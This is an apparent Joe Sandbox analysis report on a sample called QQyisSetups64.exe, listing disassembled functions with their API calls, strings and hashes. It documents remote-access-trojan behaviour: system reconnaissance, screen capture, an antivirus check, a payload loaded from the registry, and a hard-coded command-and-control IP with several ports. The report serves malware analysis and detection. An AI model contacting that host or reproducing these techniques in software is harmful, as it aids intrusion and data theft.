API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
String ID: .exe
API String ID: 2188046178-4119554291
Opcode ID: 08c39add87df28b0c646ee86c8b215fd390414fc50b3e429ccc81f143b5529b7
Instruction ID: e9e11cb9fd6853f183fefa1d41d0e0024c16e6e010e8b744e496187a2de98be2
Opcode Fuzzy Hash: 08c39add87df28b0c646ee86c8b215fd390414fc50b3e429ccc81f143b5529b7
Instruction Fuzzy Hash: FE51467480424CEFEB14CBA4CC91BEEBBB5EF54340F148199E11977296DB302A49CBA2

Function 10010771 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(100172D4,?,URLDownloader,?,1000177C,100176B8,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 1001077C
ReleaseSRWLockExclusive.KERNEL32(100172D4,?,1000177C,100176B8,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190,00000078,00000000), ref: 100107B6

Strings

URLDownloader, xrefs: 10010774

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: URLDownloader
API String ID: 17069307-1891997712
Opcode ID: 9f1511a7a3ffbcca7e38548f47a2cc02b1a111f10bc6b3d82736ec6af61c00fc
Instruction ID: 8654295f68b371237154e9a797b482e4a7d7525e36026ba3eb3070c176022b3d
Opcode Fuzzy Hash: 9f1511a7a3ffbcca7e38548f47a2cc02b1a111f10bc6b3d82736ec6af61c00fc
Instruction Fuzzy Hash: 87F0A734A04211DBD321DF14C844A65B7B4FB49770F10432EF9A98B2E1D774E8C2CE51

Analysis Process: QQyisSetups64.exePID: 7892, Parent PID: 7736COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.3%
Total number of Nodes:	611
Total number of Limit Nodes:	22

Executed Functions

Function 03785430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440
stringnetworklibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

_memset.LIBCMT ref: 0378546C
_memset.LIBCMT ref: 03785485
_memset.LIBCMT ref: 03785495
gethostname.WS2_32(?,00000032), ref: 037854A3
gethostbyname.WS2_32(?), ref: 037854AD
inet_ntoa.WS2_32 ref: 037854C5
_strcat_s.LIBCMT ref: 037854D8
_strcat_s.LIBCMT ref: 037854F1
inet_ntoa.WS2_32 ref: 0378551A
_strcat_s.LIBCMT ref: 0378552D
_strcat_s.LIBCMT ref: 03785546
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03785573
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03785587
GetLastInputInfo.USER32(?), ref: 0378559A
GetTickCount.KERNEL32 ref: 037855A0
wsprintfW.USER32 ref: 037855D5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 037855E8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 037855FC
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03785653
wsprintfW.USER32 ref: 0378566C
GetForegroundWindow.USER32 ref: 03785695
GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 037856AC
lstrlenW.KERNEL32(000008CC), ref: 037856D3
lstrlenW.KERNEL32(00000994), ref: 03785739
GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 037857AA
GetProcAddress.KERNEL32(00000000), ref: 037857B1
GetNativeSystemInfo.KERNEL32(?), ref: 037857C2
GetSystemInfo.KERNEL32(?), ref: 037857CD
wsprintfW.USER32 ref: 03785806
GetCurrentProcessId.KERNEL32 ref: 03785818
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0378582E
K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0378584B
CloseHandle.KERNEL32(037A5164), ref: 0378587F
GetTickCount.KERNEL32 ref: 037858E9
__time64.LIBCMT ref: 037858F8
__localtime64.LIBCMT ref: 0378592F
wsprintfW.USER32 ref: 03785968
GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0378597D
GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0378598C
GetCurrentHwProfileW.ADVAPI32(?), ref: 03785999

Part of subcall function 037880F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75A373E0,00000AD4,00000000), ref: 03788132
Part of subcall function 037880F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03788166
Part of subcall function 037880F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03788176
Part of subcall function 037880F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037881A6
Part of subcall function 037880F0: lstrlenW.KERNEL32(?), ref: 037881B7
Part of subcall function 037880F0: __wcsnicmp.LIBCMT ref: 037881CE
Part of subcall function 037880F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03788204

Strings

AppEvents, xrefs: 037856B6, 0378571C
2024.12. 3, xrefs: 03785758
x86, xrefs: 037857F4, 037857F9
GetNativeSystemInfo, xrefs: 0378576A
1.0, xrefs: 03785702
x64, xrefs: 037857ED
Network, xrefs: 037856C2, 03785728
kernel32.dll, xrefs: 0378576F
%d min, xrefs: 037855CF
REMARK, xrefs: 03785746
X86, xrefs: 037859B1, 037859D3
X86 %s, xrefs: 03785800
GROUP, xrefs: 037856E0

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
API String ID: 1101047656-1568689114
Opcode ID: 5edcfed743d8acdc988741e9eb2ae80a5d378aa2c742fd76fd887b39a8c6f9d6
Instruction ID: 1d770583eff9cfba53abae169bc38a8faa578285e50401c38299d14301a0b671
Opcode Fuzzy Hash: 5edcfed743d8acdc988741e9eb2ae80a5d378aa2c742fd76fd887b39a8c6f9d6
Instruction Fuzzy Hash: 0FF1F7F5A40704AFD724EB64DC45FEB73B8AF88710F008A58E71A97181EB70AA44CF55

Function 02880032 Relevance: 72.5, APIs: 3, Strings: 38, Instructions: 795memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 028804AE
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 028804DE
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 028804F5

Strings

F, xrefs: 0288018C
Lo, xrefs: 028800FC
P, xrefs: 02880176
Ta, xrefs: 0288027D
Vi, xrefs: 0288012C
Fu, xrefs: 0288025A
otec, xrefs: 0288017F
a, xrefs: 0288016D
mI, xrefs: 02880221
ee, xrefs: 028800F0
p, xrefs: 028800F7
G, xrefs: 02880205
tNat, xrefs: 0288020A
Via, xrefs: 02880312
yA, xrefs: 02880125
Cach, xrefs: 028801FA
tu, xrefs: 02880137
Rt, xrefs: 02880233
t, xrefs: 02880187
oc, xrefs: 02880154
Syst, xrefs: 02880219
S, xrefs: 028800E7
b, xrefs: 02880287
b, xrefs: 02880113
a, xrefs: 0288011C
ucti, xrefs: 028801BE
Li, xrefs: 0288010C
tu, xrefs: 02880166
iv, xrefs: 02880212
o, xrefs: 028801C9
fo, xrefs: 0288022C
st, xrefs: 028801AD
a, xrefs: 0288013E
ctio, xrefs: 0288026B
A, xrefs: 02880244
a, xrefs: 02880103
ushI, xrefs: 0288019B
A, xrefs: 02880147

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: AllocVirtual$InfoNativeSystem
String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
API String ID: 4117132724-2899676511
Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
Instruction ID: 8e6e1f8afc06ee510e5b2dbba922f1dd1134104d7621abea32ec05a6ecd2e281
Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
Instruction Fuzzy Hash: E1628B7A5083858FD730DF24C840BABBBE4FF94704F04482DE9C99B252E7749988CB56

Function 0378DF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354
sleepregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03790542: __fassign.LIBCMT ref: 03790538

Sleep.KERNEL32(00000000), ref: 0378DF64
CloseHandle.KERNEL32(00000000), ref: 0378DF91
GetLocalTime.KERNEL32(?), ref: 0378DFA9
wsprintfW.USER32 ref: 0378DFE0
SetUnhandledExceptionFilter.KERNEL32(037875B0), ref: 0378DFEE
CloseHandle.KERNEL32(00000000), ref: 0378E007

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

EnumWindows.USER32(03785CC0,?), ref: 0378E19D
Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0378E1AA
EnumWindows.USER32(03785CC0,?), ref: 0378E1BE
Sleep.KERNEL32(00000BB8), ref: 0378E1F5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0378E241
Sleep.KERNEL32(00000FA0), ref: 0378E2C4
RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0378E2EB
RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0378E30B
CloseHandle.KERNEL32(?), ref: 0378E35D
Sleep.KERNEL32(000003E8,?,?), ref: 0378E3A4
WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0378E3D0
CloseHandle.KERNEL32(?,?,?), ref: 0378E3D7
Sleep.KERNEL32(000003E8,?,?), ref: 0378E3E2
CloseHandle.KERNEL32(?), ref: 0378E400
WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0378E425
CloseHandle.KERNEL32(?,?,?), ref: 0378E42C
Sleep.KERNEL32(00000000,?,?,?), ref: 0378E446
CloseHandle.KERNEL32(?), ref: 0378E464

Strings

19092, xrefs: 0378E08F, 0378E0D7, 0378E135, 0378E1CE, 0378E20C
118.107.44.219, xrefs: 0378E117
19092, xrefs: 0378E0D0
118.107.44.219, xrefs: 0378E071
IpDatespecial, xrefs: 0378E305
19093, xrefs: 0378E12E
118.107.44.219, xrefs: 0378E0B9
%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 0378DFDA
Console, xrefs: 0378E2D5
19091, xrefs: 0378E088
118.107.44.219, xrefs: 0378E07B, 0378E0C3, 0378E121, 0378E1E5, 0378E253

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19092$19093$Console$IpDatespecial
API String ID: 1511462596-2550096010
Opcode ID: 2c1e5f501beb2b6dba74dada890d16cd1924327ae8b1592f08d209acf54b701c
Instruction ID: 6f53bcffb4c0187676d8605d6b5e47c973eadf982289e43d3de6b5c05f164cee
Opcode Fuzzy Hash: 2c1e5f501beb2b6dba74dada890d16cd1924327ae8b1592f08d209acf54b701c
Instruction Fuzzy Hash: A8D1C1B0684700AFE320FF64DC89F6EB7B8BBC5710F148A2CF55596685E7759404CB62

Function 0378BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDesktopWindow.USER32 ref: 0378BC8F
GetDC.USER32(00000000), ref: 0378BC9C
CreateCompatibleDC.GDI32(00000000), ref: 0378BCA2
GetDC.USER32(00000000), ref: 0378BCAD
GetDeviceCaps.GDI32(00000000,00000008), ref: 0378BCBA
GetDeviceCaps.GDI32(00000000,00000076), ref: 0378BCC2
ReleaseDC.USER32(00000000,00000000), ref: 0378BCD3
GetSystemMetrics.USER32(0000004E), ref: 0378BCF8
GetSystemMetrics.USER32(0000004F), ref: 0378BD26
GetSystemMetrics.USER32(0000004C), ref: 0378BD78
GetSystemMetrics.USER32(0000004D), ref: 0378BD8D
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0378BDA6
SelectObject.GDI32(?,00000000), ref: 0378BDB4
SetStretchBltMode.GDI32(?,00000003), ref: 0378BDC0
GetSystemMetrics.USER32(0000004F), ref: 0378BDCD
GetSystemMetrics.USER32(0000004E), ref: 0378BDE0
StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0378BE07
_memset.LIBCMT ref: 0378BE7A
GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0378BE97
_memset.LIBCMT ref: 0378BEAF

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

DeleteObject.GDI32(?), ref: 0378BF23
DeleteObject.GDI32(?), ref: 0378BF2D
ReleaseDC.USER32(00000000,?), ref: 0378BF39
DeleteObject.GDI32(?), ref: 0378BFDF
DeleteObject.GDI32(?), ref: 0378BFE9
ReleaseDC.USER32(00000000,?), ref: 0378BFF5

Strings

6, xrefs: 0378BE61
(, xrefs: 0378BE3E
gfff, xrefs: 0378BD38
gfff, xrefs: 0378BD10

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
String ID: ($6$gfff$gfff
API String ID: 3293817703-713438465
Opcode ID: 6faee7b9db8f52762a3227456823e1b2b20d1ef3da0ee55d2564470491d1dad5
Instruction ID: 57ea671c80812e2cbf9b28593befbe93e225fbcc0ee55b6063da1c40e4f65513
Opcode Fuzzy Hash: 6faee7b9db8f52762a3227456823e1b2b20d1ef3da0ee55d2564470491d1dad5
Instruction Fuzzy Hash: 44D16EB1E01308EFDB14EFE9E889A9EBBB9FF88300F144529F505AB241D774A945CB51

Function 03786A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(75A373E0), ref: 03786A94
wsprintfW.USER32 ref: 03786AA7

Part of subcall function 03786910: GetCurrentProcessId.KERNEL32(453DC9E3,00000000,00000000,75A373E0,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786938
Part of subcall function 03786910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786947
Part of subcall function 03786910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786960
Part of subcall function 03786910: CloseHandle.KERNEL32(00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 0378696B

_memset.LIBCMT ref: 03786AC2
GetVersionExW.KERNEL32(?), ref: 03786ADB
GetCurrentProcess.KERNEL32(00000008,?), ref: 03786B12
OpenProcessToken.ADVAPI32(00000000), ref: 03786B19
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03786B3F
GetLastError.KERNEL32 ref: 03786B49
LocalAlloc.KERNEL32(00000040,?), ref: 03786B5D
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03786B85
GetSidSubAuthorityCount.ADVAPI32 ref: 03786B98
GetSidSubAuthority.ADVAPI32(00000000), ref: 03786BA6
LocalFree.KERNEL32(?), ref: 03786BB5
CloseHandle.KERNEL32(?), ref: 03786BC2
wsprintfW.USER32 ref: 03786C1B

Strings

None/%s, xrefs: 03786BE7
-N/, xrefs: 03786BEF
NO/, xrefs: 03786BDF

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
String ID: -N/$NO/$None/%s
API String ID: 3036438616-3095023699
Opcode ID: aebad1596d24c3afa154e75a799a9efff3f7d181e1543a8750806876abb7d2c5
Instruction ID: 5abe2f44bb5d8f9dda52cf37cae31c0bee42939a3f0e74892ba8311ac13059e9
Opcode Fuzzy Hash: aebad1596d24c3afa154e75a799a9efff3f7d181e1543a8750806876abb7d2c5
Instruction Fuzzy Hash: 1641C4B0A40618BFDB20FB64DC88FEF7B78EB89314F048595FA0596142DA38D990CF61

Function 03786150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222
stringcomregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0378618B
lstrcatW.KERNEL32(037B1F10,037A510C,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 037861CD
lstrcatW.KERNEL32(037B1F10,037A535C,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 037861D9
CoCreateInstance.OLE32(037A2480,00000000,00000017,037A578C,?,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 03786220
_memset.LIBCMT ref: 037862CE
wsprintfW.USER32 ref: 03786336
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0378635F
_memset.LIBCMT ref: 03786376

Part of subcall function 03786050: _memset.LIBCMT ref: 0378607C
Part of subcall function 03786050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03786088

Strings

Windows Defender IOfficeAntiVirus implementation , xrefs: 03786186, 037861C8, 037861D4, 037863C9, 037863D5, 03786422, 03786436, 0378645A
CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 03786330

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
API String ID: 1221949200-1583895642
Opcode ID: 057029a70de8c3f8a6167f18a96efeefc436d125e6435fe5ae6ff29d4cd65b2a
Instruction ID: 4da6991b806cfacb5f697f4789e8cfa44e2b78a473866a071467712b93d70011
Opcode Fuzzy Hash: 057029a70de8c3f8a6167f18a96efeefc436d125e6435fe5ae6ff29d4cd65b2a
Instruction Fuzzy Hash: 678174F1A40628AFDB20EB54CC55FAEB7B8EB88704F0445C9F719A7246D6749E40CF64

Function 037880F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32(000003E8,?,75A373E0,00000AD4,00000000), ref: 03788132
lstrcmpiW.KERNEL32(?,A:\), ref: 03788166
lstrcmpiW.KERNEL32(?,B:\), ref: 03788176
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037881A6
lstrlenW.KERNEL32(?), ref: 037881B7
__wcsnicmp.LIBCMT ref: 037881CE
lstrcpyW.KERNEL32(00000AD4,?), ref: 03788204
lstrcpyW.KERNEL32(?,?), ref: 03788228
lstrcatW.KERNEL32(?,00000000), ref: 03788233

Strings

A:\, xrefs: 03788160
B:\, xrefs: 03788170

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
String ID: A:\$B:\
API String ID: 950920757-1009255891
Opcode ID: 997d5ab36284bb1326ed52a5275b98506e0f3adc787281ee308acc432959b22b
Instruction ID: 396b94c387103cf7bba237a6793edab1e785c40f40f622c44de222689740aaf3
Opcode Fuzzy Hash: 997d5ab36284bb1326ed52a5275b98506e0f3adc787281ee308acc432959b22b
Instruction Fuzzy Hash: 4441F671A41618EFDB20EF64DD84AEEB3B8EF84700F448599DE0AA3141EB74DA05CB95

Function 03786790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03785320: InterlockedDecrement.KERNEL32(00000008), ref: 0378536F
Part of subcall function 03785320: SysFreeString.OLEAUT32(00000000), ref: 03785384
Part of subcall function 03785320: SysAllocString.OLEAUT32(037A5148), ref: 037853D5

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,037A5148,037869A4,037A5148,00000000,75A373E0), ref: 037867F4
GetLastError.KERNEL32 ref: 037867FE
GetProcessHeap.KERNEL32(00000008,?), ref: 03786816
HeapAlloc.KERNEL32(00000000), ref: 0378681D
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0378683F
LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03786871
GetLastError.KERNEL32 ref: 0378687B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 037868E6
HeapFree.KERNEL32(00000000), ref: 037868ED

Strings

NONE_MAPPED, xrefs: 03786888

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
String ID: NONE_MAPPED
API String ID: 1317816589-2950899194
Opcode ID: d392be42587114b3e33a7ead60407aa44f4d0a0fcc3e70a6dd75aedd7a0e0f02
Instruction ID: 4520d25594a180c023c0ab8f003400462eab7ccc03290395d9342949c0c66774
Opcode Fuzzy Hash: d392be42587114b3e33a7ead60407aa44f4d0a0fcc3e70a6dd75aedd7a0e0f02
Instruction Fuzzy Hash: 5841A5B5A40618AFDB20EB64DC48FAFB37CEBC5700F008998E709A7141DB745A859F60

Function 03786C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,771ADF80,00000000,75A373E0), ref: 03786C8B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03786CAA
_memset.LIBCMT ref: 03786CE1
GlobalMemoryStatusEx.KERNEL32(?), ref: 03786CF4
swprintf.LIBCMT ref: 03786D39
swprintf.LIBCMT ref: 03786D4C

Strings

%sFree%d Gb , xrefs: 03786D41
HDD:%d, xrefs: 03786D2E
@, xrefs: 03786CED
:, xrefs: 03786C80

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
String ID: %sFree%d Gb $:$@$HDD:%d
API String ID: 3202570353-3501811827
Opcode ID: c086429abb4dc406db045a5dff3843b07021d2e7199ac23d144dfde2a112dd8e
Instruction ID: c593def81403e60bb04a4e1cadfb523b9af37f651abbe7268ff30f7fd4b1472d
Opcode Fuzzy Hash: c086429abb4dc406db045a5dff3843b07021d2e7199ac23d144dfde2a112dd8e
Instruction Fuzzy Hash: 403172B6D4020C9BDB14DFE9DC45FEEB7B9FB88700F50821DEA1AA7241D6746905CB50

Function 03786EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON

Download Yara Rule

APIs

CreateDXGIFactory.DXGI(037A579C,?,453DC9E3,771ADF80,00000000,75A373E0), ref: 03786F4A
swprintf.LIBCMT ref: 0378711E
std::_Xinvalid_argument.LIBCPMT ref: 037871C7

Strings

vector<T> too long, xrefs: 037871C2
%s%s %d*%d , xrefs: 03787337
%s%s %d %d , xrefs: 03787113

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateFactoryXinvalid_argumentstd::_swprintf
String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
API String ID: 3803070356-257307503
Opcode ID: ed470a54e84af8251f73640d9671323164cf75233aac1a3c86870b4f8794e75f
Instruction ID: bd1d84cbbe1308a449f4dd53aabd64eb78feb8ff98e2ac32d4b535260041cf93
Opcode Fuzzy Hash: ed470a54e84af8251f73640d9671323164cf75233aac1a3c86870b4f8794e75f
Instruction Fuzzy Hash: BBE18971E402659FDF68DF64CC80BEEB375AF89700F2445D9D91AA7284D7309E818F91

Function 02C854C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263
registrymemorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02C85507
RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C8552E
_memset.LIBCMT ref: 02C85548
RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C85563
VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C85586
RegCloseKey.ADVAPI32(?), ref: 02C855B1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 02C85605
_memset.LIBCMT ref: 02C85669
_memset.LIBCMT ref: 02C8568D
_memset.LIBCMT ref: 02C8569F
VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C85726
RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02C85799
RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 02C857AC
RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 02C857C4
RegCloseKey.KERNEL32(?), ref: 02C857CE
Sleep.KERNEL32(00000BB8), ref: 02C857FE

Strings

i, xrefs: 02C85658
9e9e85e05ee16fc372a0c7df6549fbd4, xrefs: 02C85528, 02C8555D, 02C857A6, 02C857BE
{vU_, xrefs: 02C85626
e, xrefs: 02C854DC
0d3b34577c0a66584d5bdc849e214016, xrefs: 02C855BA
Console\0, xrefs: 02C854F3, 02C8578F
